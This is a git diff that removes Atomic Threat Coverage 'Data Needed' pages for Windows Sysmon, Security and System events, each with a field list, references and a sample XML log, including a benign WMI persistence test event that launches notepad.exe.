-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event logs when a named pipe connection is made between a client and a  server |
-| **Logging Policy** | <ul><li>[LP0009_windows_sysmon_PipeEvent](../Logging_Policies/LP0009_windows_sysmon_PipeEvent.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-18.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-18.md)</li><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90018](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90018)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>EventType</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>PipeName</li><li>Image</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>18</EventID> 
-    <Version>1</Version> 
-    <Level>4</Level> 
-    <Task>18</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-09T04:22:41.815238100Z" /> 
-    <EventRecordID>15894</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="1540" ThreadID="3456" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="EventType">ConnectPipe</Data> 
-    <Data Name="UtcTime">2019-07-09 04:22:41.814</Data> 
-    <Data Name="ProcessGuid">{717CFEC0-1691-5D24-0000-0010663D4100}</Data> 
-    <Data Name="ProcessId">6376</Data> 
-    <Data Name="PipeName">\crashpad_5624_JOJRKPKWKSIWYAIJ</Data> 
-    <Data Name="Image">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0022_19_windows_sysmon_WmiEvent.md b/Atomic_Threat_Coverage/Data_Needed/DN0022_19_windows_sysmon_WmiEvent.md
deleted file mode 100644
index 9b0646a..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0022_19_windows_sysmon_WmiEvent.md
+++ /dev/null
@@ -1,52 +0,0 @@
-| Title              | DN0022_19_windows_sysmon_WmiEvent       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | When a WMI event filter is registered, which is a method used by malware to  execute, this event logs the WMI namespace, filter name and filter expression |
-| **Logging Policy** | <ul><li>[LP0010_windows_sysmon_WmiEvent](../Logging_Policies/LP0010_windows_sysmon_WmiEvent.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-19.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-19.md)</li><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90019](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90019)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>EventType</li><li>Operation</li><li>User</li><li>EventNamespace</li><li>Name</li><li>Query</li><li>RuleName</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>19</EventID> 
-    <Version>3</Version> 
-    <Level>4</Level> 
-    <Task>19</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-02-05T14:44:42.434534600Z" /> 
-    <EventRecordID>46712</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="3172" ThreadID="444" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="EventType">WmiFilterEvent</Data> 
-    <Data Name="UtcTime">2019-02-05 14:44:42.432</Data> 
-    <Data Name="Operation">Created</Data> 
-    <Data Name="User">atc-win-10\user1</Data> 
-    <Data Name="EventNamespace">"root\\CimV2"</Data> 
-    <Data Name="Name">"AtomicRedTeam-WMIPersistence-Example"</Data> 
-    <Data Name="Query">"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0023_20_windows_sysmon_WmiEvent.md b/Atomic_Threat_Coverage/Data_Needed/DN0023_20_windows_sysmon_WmiEvent.md
deleted file mode 100644
index b0cec1f..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0023_20_windows_sysmon_WmiEvent.md
+++ /dev/null
@@ -1,52 +0,0 @@
-| Title              | DN0023_20_windows_sysmon_WmiEvent       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event logs the registration of WMI consumers, recording the consumer  name, log, and destination |
-| **Logging Policy** | <ul><li>[LP0010_windows_sysmon_WmiEvent](../Logging_Policies/LP0010_windows_sysmon_WmiEvent.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-20.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-20.md)</li><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90020](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90020)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>EventType</li><li>Operation</li><li>User</li><li>Name</li><li>Type</li><li>Destination</li><li>RuleName</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>20</EventID> 
-    <Version>3</Version> 
-    <Level>4</Level> 
-    <Task>20</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-02-05T14:44:42.518512400Z" /> 
-    <EventRecordID>46713</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="3172" ThreadID="444" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="EventType">WmiConsumerEvent</Data> 
-    <Data Name="UtcTime">2019-02-05 14:44:42.510</Data> 
-    <Data Name="Operation">Created</Data> 
-    <Data Name="User">atc-win-10\user1</Data> 
-    <Data Name="Name">"AtomicRedTeam-WMIPersistence-Example"</Data> 
-    <Data Name="Type">Command Line</Data> 
-    <Data Name="Destination">"C:\\windows\\System32\\notepad.exe"</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0024_21_windows_sysmon_WmiEvent.md b/Atomic_Threat_Coverage/Data_Needed/DN0024_21_windows_sysmon_WmiEvent.md
deleted file mode 100644
index 3f81cf4..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0024_21_windows_sysmon_WmiEvent.md
+++ /dev/null
@@ -1,51 +0,0 @@
-| Title              | DN0024_21_windows_sysmon_WmiEvent       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | When a consumer binds to a filter, this event logs the consumer name and  filter path |
-| **Logging Policy** | <ul><li>[LP0010_windows_sysmon_WmiEvent](../Logging_Policies/LP0010_windows_sysmon_WmiEvent.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-21.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-21.md)</li><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90021](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90021)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>EventType</li><li>Operation</li><li>User</li><li>Consumer</li><li>RuleName</li><li>Filter</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>21</EventID> 
-    <Version>3</Version> 
-    <Level>4</Level> 
-    <Task>21</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-02-05T14:44:47.091658300Z" /> 
-    <EventRecordID>46714</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="3172" ThreadID="444" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="EventType">WmiBindingEvent</Data> 
-    <Data Name="UtcTime">2019-02-05 14:44:47.087</Data> 
-    <Data Name="Operation">Created</Data> 
-    <Data Name="User">atc-win-10\user1</Data> 
-    <Data Name="Consumer">"\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\"AtomicRedTeam-WMIPersistence-Example\""</Data> 
-    <Data Name="Filter">"\\\\.\\ROOT\\subscription:__EventFilter.Name=\"AtomicRedTeam-WMIPersistence-Example\""</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0026_5136_windows_directory_service_object_was_modified.md b/Atomic_Threat_Coverage/Data_Needed/DN0026_5136_windows_directory_service_object_was_modified.md
deleted file mode 100644
index 7ceb470..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0026_5136_windows_directory_service_object_was_modified.md
+++ /dev/null
@@ -1,59 +0,0 @@
-| Title              | DN0026_5136_windows_directory_service_object_was_modified       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | A directory service object was modified |
-| **Logging Policy** | <ul><li>[LP0025_windows_audit_directory_service_changes](../Logging_Policies/LP0025_windows_audit_directory_service_changes.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-5136.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-5136.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>OpCorrelationID</li><li>AppCorrelationID</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>DSName</li><li>DSType</li><li>ObjectDN</li><li>ObjectGUID</li><li>ObjectClass</li><li>AttributeLDAPDisplayName</li><li>AttributeSyntaxOID</li><li>AttributeValue</li><li>OperationType</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>5136</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>14081</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-08-28T17:36:04.129472600Z" /> 
-    <EventRecordID>410204</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="516" ThreadID="4020" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="OpCorrelationID">{02647639-8626-43CE-AFE6-7AA1AD657739}</Data> 
-    <Data Name="AppCorrelationID">-</Data> 
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x32004</Data> 
-    <Data Name="DSName">contoso.local</Data> 
-    <Data Name="DSType">%%14676</Data> 
-    <Data Name="ObjectDN">CN=Sergey,CN=Builtin,DC=contoso,DC=local</Data> 
-    <Data Name="ObjectGUID">{4FE80A66-5F93-4F73-B215-68678058E613}</Data> 
-    <Data Name="ObjectClass">user</Data> 
-    <Data Name="AttributeLDAPDisplayName">userAccountControl</Data> 
-    <Data Name="AttributeSyntaxOID">2.5.5.9</Data> 
-    <Data Name="AttributeValue">512</Data> 
-    <Data Name="OperationType">%%14675</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0027_4738_user_account_was_changed.md b/Atomic_Threat_Coverage/Data_Needed/DN0027_4738_user_account_was_changed.md
deleted file mode 100644
index 195a749..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0027_4738_user_account_was_changed.md
+++ /dev/null
@@ -1,70 +0,0 @@
-| Title              | DN0027_4738_user_account_was_changed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | User object is changed |
-| **Logging Policy** | <ul><li>[LP0026_windows_audit_user_account_management](../Logging_Policies/LP0026_windows_audit_user_account_management.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4738.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4738.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>TargetUserName</li><li>Hostname</li><li>TargetDomainName</li><li>TargetSid</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>PrivilegeList</li><li>SamAccountName</li><li>DisplayName</li><li>UserPrincipalName</li><li>HomeDirectory</li><li>HomePath</li><li>ScriptPath</li><li>ProfilePath</li><li>UserWorkstations</li><li>PasswordLastSet</li><li>AccountExpires</li><li>PrimaryGroupId</li><li>AllowedToDelegateTo</li><li>OldUacValue</li><li>NewUacValue</li><li>UserAccountControl</li><li>UserParameters</li><li>SidHistory</li><li>LogonHours</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4738</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>13824</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-08-20T16:22:02.792454100Z" /> 
-    <EventRecordID>175413</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="520" ThreadID="1508" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="TargetUserName">ksmith</Data> 
-    <Data Name="TargetDomainName">CONTOSO</Data> 
-    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6609</Data> 
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x30dc2</Data> 
-    <Data Name="PrivilegeList">-</Data> 
-    <Data Name="SamAccountName">-</Data> 
-    <Data Name="DisplayName">-</Data> 
-    <Data Name="UserPrincipalName">-</Data> 
-    <Data Name="HomeDirectory">-</Data> 
-    <Data Name="HomePath">-</Data> 
-    <Data Name="ScriptPath">-</Data> 
-    <Data Name="ProfilePath">-</Data> 
-    <Data Name="UserWorkstations">-</Data> 
-    <Data Name="PasswordLastSet">-</Data> 
-    <Data Name="AccountExpires">-</Data> 
-    <Data Name="PrimaryGroupId">-</Data> 
-    <Data Name="AllowedToDelegateTo">-</Data> 
-    <Data Name="OldUacValue">0x15</Data> 
-    <Data Name="NewUacValue">0x211</Data> 
-    <Data Name="UserAccountControl">%%2050 %%2089</Data> 
-    <Data Name="UserParameters">-</Data> 
-    <Data Name="SidHistory">-</Data> 
-    <Data Name="LogonHours">-</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0028_4794_directory_services_restore_mode_admin_password_set.md b/Atomic_Threat_Coverage/Data_Needed/DN0028_4794_directory_services_restore_mode_admin_password_set.md
deleted file mode 100644
index f78c1ea..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0028_4794_directory_services_restore_mode_admin_password_set.md
+++ /dev/null
@@ -1,50 +0,0 @@
-| Title              | DN0028_4794_directory_services_restore_mode_admin_password_set       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Directory Services Restore Mode (DSRM) administrator password is changed |
-| **Logging Policy** | <ul><li>[LP0026_windows_audit_user_account_management](../Logging_Policies/LP0026_windows_audit_user_account_management.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4794.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4794.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>Workstation</li><li>Status</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4794</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>13824</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-08-18T02:49:26.087748900Z" /> 
-    <EventRecordID>172348</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="520" ThreadID="2964" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x36f67</Data> 
-    <Data Name="Workstation">DC01</Data> 
-    <Data Name="Status">0x0</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0029_4661_handle_to_an_object_was_requested.md b/Atomic_Threat_Coverage/Data_Needed/DN0029_4661_handle_to_an_object_was_requested.md
deleted file mode 100644
index 185986a..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0029_4661_handle_to_an_object_was_requested.md
+++ /dev/null
@@ -1,60 +0,0 @@
-| Title              | DN0029_4661_handle_to_an_object_was_requested       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | A handle was requested for either an Active Directory object or a Security  Account Manager (SAM) object |
-| **Logging Policy** | <ul><li>[LP0027_windows_audit_directory_service_access](../Logging_Policies/LP0027_windows_audit_directory_service_access.md)</li><li>[LP0028_windows_audit_sam](../Logging_Policies/LP0028_windows_audit_sam.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4794.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4794.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>ObjectServer</li><li>ObjectType</li><li>ObjectName</li><li>HandleId</li><li>TransactionId</li><li>AccessList</li><li>AccessMask</li><li>PrivilegeList</li><li>Properties</li><li>RestrictedSidCount</li><li>ProcessId</li><li>ProcessName</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4661</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>14080</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-30T00:11:56.547696700Z" /> 
-    <EventRecordID>1048009</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="520" ThreadID="528" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x4280e</Data> 
-    <Data Name="ObjectServer">Security Account Manager</Data> 
-    <Data Name="ObjectType">SAM\_DOMAIN</Data> 
-    <Data Name="ObjectName">DC=contoso,DC=local</Data> 
-    <Data Name="HandleId">0xdd64d36870</Data> 
-    <Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data> 
-    <Data Name="AccessList">%%5400</Data> 
-    <Data Name="AccessMask">0x2d</Data> 
-    <Data Name="PrivilegeList">Ā</Data> 
-    <Data Name="Properties">-</Data> 
-    <Data Name="RestrictedSidCount">2949165</Data> 
-    <Data Name="ProcessId">0x9000a000d002d</Data> 
-    <Data Name="ProcessName">{bf967a90-0de6-11d0-a285-00aa003049e2} %%5400 {ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501}</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0030_4662_operation_was_performed_on_an_object.md b/Atomic_Threat_Coverage/Data_Needed/DN0030_4662_operation_was_performed_on_an_object.md
deleted file mode 100644
index db8da0c..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0030_4662_operation_was_performed_on_an_object.md
+++ /dev/null
@@ -1,58 +0,0 @@
-| Title              | DN0030_4662_operation_was_performed_on_an_object       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | An operation was performed on an Active Directory object |
-| **Logging Policy** | <ul><li>[LP0027_windows_audit_directory_service_access](../Logging_Policies/LP0027_windows_audit_directory_service_access.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4662.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4662.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>ObjectServer</li><li>ObjectType</li><li>ObjectName</li><li>OperationType</li><li>HandleId</li><li>AccessList</li><li>AccessMask</li><li>Properties</li><li>AdditionalInfo</li><li>AdditionalInfo2</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4662</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>14080</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-08-28T01:58:36.894922400Z" /> 
-    <EventRecordID>407230</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="520" ThreadID="600" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x35867</Data> 
-    <Data Name="ObjectServer">DS</Data> 
-    <Data Name="ObjectType">%{bf967a86-0de6-11d0-a285-00aa003049e2}</Data> 
-    <Data Name="ObjectName">%{38b3d2e6-9948-4dc1-ae90-1605d5eab9a2}</Data> 
-    <Data Name="OperationType">Object Access</Data> 
-    <Data Name="HandleId">0x0</Data> 
-    <Data Name="AccessList">%%1537</Data> 
-    <Data Name="AccessMask">0x10000</Data> 
-    <Data Name="Properties">%%1537 {bf967a86-0de6-11d0-a285-00aa003049e2}</Data> 
-    <Data Name="AdditionalInfo">-</Data> 
-    <Data Name="AdditionalInfo2" /> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0031_7036_service_started_stopped.md b/Atomic_Threat_Coverage/Data_Needed/DN0031_7036_service_started_stopped.md
deleted file mode 100644
index 00a03c7..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0031_7036_service_started_stopped.md
+++ /dev/null
@@ -1,47 +0,0 @@
-| Title              | DN0031_7036_service_started_stopped       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Service entered the running/stopped state |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[http://www.eventid.net/display-eventid-7036-source-Service%20Control%20Manager-eventno-1529-phase-1.htm](http://www.eventid.net/display-eventid-7036-source-Service%20Control%20Manager-eventno-1529-phase-1.htm)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | System     |
-| **Provider**       | Service Control Manager    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>param1</li><li>param2</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>
-  - <System>
-    <Provider Name='Service Control Manager' Guid='{555908d1-a6d7-4695-8e1e-26931d2012f4}' EventSourceName='Service Control Manager'/>
-    <EventID Qualifiers='16384'>7036</EventID>
-    <Version>0</Version>
-    <Level>4</Level>
-    <Task>0</Task>
-    <Opcode>0</Opcode>
-    <Keywords>0x8080000000000000</Keywords>
-    <TimeCreated SystemTime='2019-01-12T16:00:11.920020600Z'/>
